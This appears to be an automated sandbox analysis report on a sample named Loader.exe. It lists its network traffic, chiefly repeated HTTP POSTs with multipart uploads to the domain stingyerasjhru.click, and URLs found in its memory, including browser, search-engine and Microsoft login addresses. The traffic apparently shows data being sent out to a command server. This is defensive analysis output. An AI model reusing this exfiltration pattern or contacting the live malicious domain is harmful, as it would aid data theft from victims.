                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: stingyerasjhru.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HYH221AA6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20490Host: stingyerasjhru.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VS3FTQUB1ATL6UQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10923Host: stingyerasjhru.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=633ISA4XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20510Host: stingyerasjhru.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KZ6WSVI09ZW9FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: stingyerasjhru.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=35BJGYNIRP2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1079788Host: stingyerasjhru.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: stingyerasjhru.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comrD equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: stingyerasjhru.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exe, 00000003.00000003.91088526468.0000000005E79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
                Source: Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
                Source: Loader.exe, 00000003.00000003.91061681849.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062074801.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: Loader.exe, 00000003.00000003.91061681849.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062074801.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: Loader.exe, 00000003.00000003.91061681849.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062074801.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
                Source: Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
                Source: Loader.exe, 00000003.00000003.91778448742.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778448742.0000000003428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/C
                Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/F
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/Og
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/Rd
                Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/T
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/Vg
                Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/aRd
                Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91106220874.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105870640.0000000003412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/api
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/api=
                Source: Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiC
                Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiP
                Source: Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiV
                Source: Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apibca
                Source: Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apie
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apintOS
                Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apior
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiqS
                Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apir
                Source: Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apitreak
                Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/bxg
                Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/e
                Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/m$g
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/s
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/sqg
                Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/xg
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
                Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
                Source: Loader.exe, 00000003.00000003.91061973141.0000000005E8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.c(om/
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
                Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
                Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49755 version: TLS 1.2
